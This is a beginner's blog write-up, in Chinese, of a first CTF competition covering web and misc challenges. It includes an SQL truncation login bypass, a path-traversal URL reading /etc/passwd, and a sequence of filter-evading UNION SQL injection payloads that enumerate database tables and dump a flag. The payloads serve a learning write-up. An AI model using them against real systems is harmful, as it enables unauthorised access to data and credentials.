整理一下第一次CTF(web+杂项)

第一次做题,知道差距在哪了,被打的落花流水,片甲不留,总之非常失败吧,只做题不整理的都是耍流氓,改变耍流氓。

后台管理系统

这道题考察的是sql约束攻击,在Bugku中遇到过,当时做的时候没想到,知识还是不够全面。
这个博客讲的比较详细,其中也有bugku中的题目
sql约束攻击总结
在这里插入图片描述跟bugku中的题目基本上一模一样,害,还是因为没整理,做过的都没印象,注册admin+空格(上边链接有原理),任意密码,然后用admin+密码登录就拿到了flag,很简单有木有,可是想不到就不知道。。。
在这里插入图片描述

阿童木爱好者小站

打开看到有16张图片,图片我就联想到了杂项,果然太菜,然后一个个保存,用binwalk分析,啥都没有,然后还用了stegsolve,毛都没有。。。然后我看了看源代码,题目突破口被我完美错过,看了一点感觉都没有,还是菜,害!
在这里插入图片描述题目突破口download.php?name= 这么明显的突破口竟然没感觉,还是刷题少。。但是就算我找到了突破口,我也做不出来,name传的值是我的盲区。盲区太多了
name传的值是/etc目录,之前完全没接触。。奇怪的知识+1。/etc目录详解
这一题就是获取用户数据库中的数据,flag就在数据库中。
构建payload:http://156eeea58ba695c8.yunyansec.com/download.php?name=/etc/passwd,下载数据库信息,打开发现最后的base64编码flag。
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200426194945495.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RvbmtleU1vb24=,size_16,color_FFFFFF,t_70解码得到

在这里插入图片描述

打假

这道题在做的时候就知道是rar的伪加密,但是之前没做过,不会解,搜了好多也没发现有用的信息,其实会做之后也挺简单。。还是还是知识储备不够!打开网页下载flag.rar,然后用winhex打开,修改一个数据就好了。
把第二行的第八个数据修改为80就解密了,但是师傅讲的时候是修改的84,但是弄了好久没弄好,最后还是问了小伙伴。奇怪的知识+2

在这里插入图片描述在这里插入图片描述

大学生活

在这里插入图片描述看url明显的sql注入,放到sqlmap里边没跑出来,然后我就手工注入,但是发现只有一个回显,我以为是盲注,手工盲注。。我就放弃了,但是他不是。。只是过滤了很多东西,构造的语句不对,过滤了空格,order…用//代替空格,也可以用()。
放上师傅的语句
?id=1/
/%26//1
?id=1/
/%26//0
?id=1/
/group//by//6
?id=-1//union//select//1,database(),3,4,5,6,7
?id=-2/
/union//select//1,group_concat(table_name),3,4,5,6,7//from//information_schema.tables//where//!(table_schema<>“web”)
?id=-2//union//select//1,group_concat(column_name),3,4,5,6,7//from//information_schema.columns//where//!(table_name<>“flag”)
?id=-2/
/union//select//1,flag,3,4,5,6,7//from//flag
得到flag
在这里插入图片描述

手绘

在这里插入图片描述打开就一张图片,这铁杂项了吧,用binwalk看一下,里边还有一张png图片,dd或者foremost提取一下,提取出来是两张一模一样的,两张图片考察盲水印。赛前培训有讲到,可是我没听。。遗憾。
用github上的脚本跑一下,但是python没有cv2模块,跑不出来,整了一下午也没搞好,搞好再试吧。

在这里插入图片描述

find the hacker

在这里插入图片描述打开好多登录信息,没有头绪,小伙伴说一个一个试,数据太多了,试了几个 ,找一下有什么不同的地方,前边都是404,我认为的是还没有被爆破,然后继续往下找,然后找到了302/304,在一堆302中试了一下,没用,我就想着肯定是在这临界的地方,然后往下找,在一堆200中发现了302,然后就去试了一下,就找到了
在这里插入图片描述还有一个ssti的题目,但是一直报错,也没找到flag,等以后慢慢摸索吧,另一个web题我感觉有点难,用到了php伪协议接触过,但是当初做题的时候没想到,通过php://filter读出三个文件,然后代码审计,用到了session,盲区。还是增长了不少知识。难题后边慢慢整理。

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
根据提供的引用内容,我了解到你在CTF比赛中遇到了一些问题。关于CTF杂项题目中的filter,我可以给你一些介绍。 在CTF比赛中,filter通常是指一种对输入进行过滤或转换的机制。这些题目可能会要求你通过某种方式绕过或绕过过滤器来获取答案或漏洞。 常见的filter类型包括: 1. 字符串过滤器:这些过滤器会限制你可以输入的字符或字符串。你可能需要尝试不同的字符或字符组合来绕过过滤器。 2. 文件过滤器:这些过滤器会限制你可以上传或读取的文件类型。你可能需要找到一种方法来绕过文件类型检查,以上传或读取特定类型的文件。 3. 命令过滤器:这些过滤器会限制你可以执行的命令或命令参数。你可能需要找到一种方法来绕过命令过滤器,以执行特定的命令或参数。 为了解决这些题目,你可以尝试以下方法: 1. 了解过滤器的工作原理:阅读题目描述和提示,了解过滤器是如何工作的,以及它们可能会限制哪些内容。 2. 分析过滤器的漏洞:尝试找到过滤器的漏洞或绕过点。这可能需要对过滤器进行代码审计或尝试不同的输入。 3. 尝试不同的输入:尝试使用不同的字符、字符串、文件类型或命令参数来绕过过滤器。你可以尝试一些常见的绕过技巧,如URL编码、特殊字符、文件扩展名绕过等。 4. 与团队合作:如果你遇到了困难,可以与你的团队成员或其他参赛者合作,共同解决问题。他们可能有不同的思路和经验,可以帮助你找到答案。 希望这些信息对你有帮助!如果你有任何进一步的问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值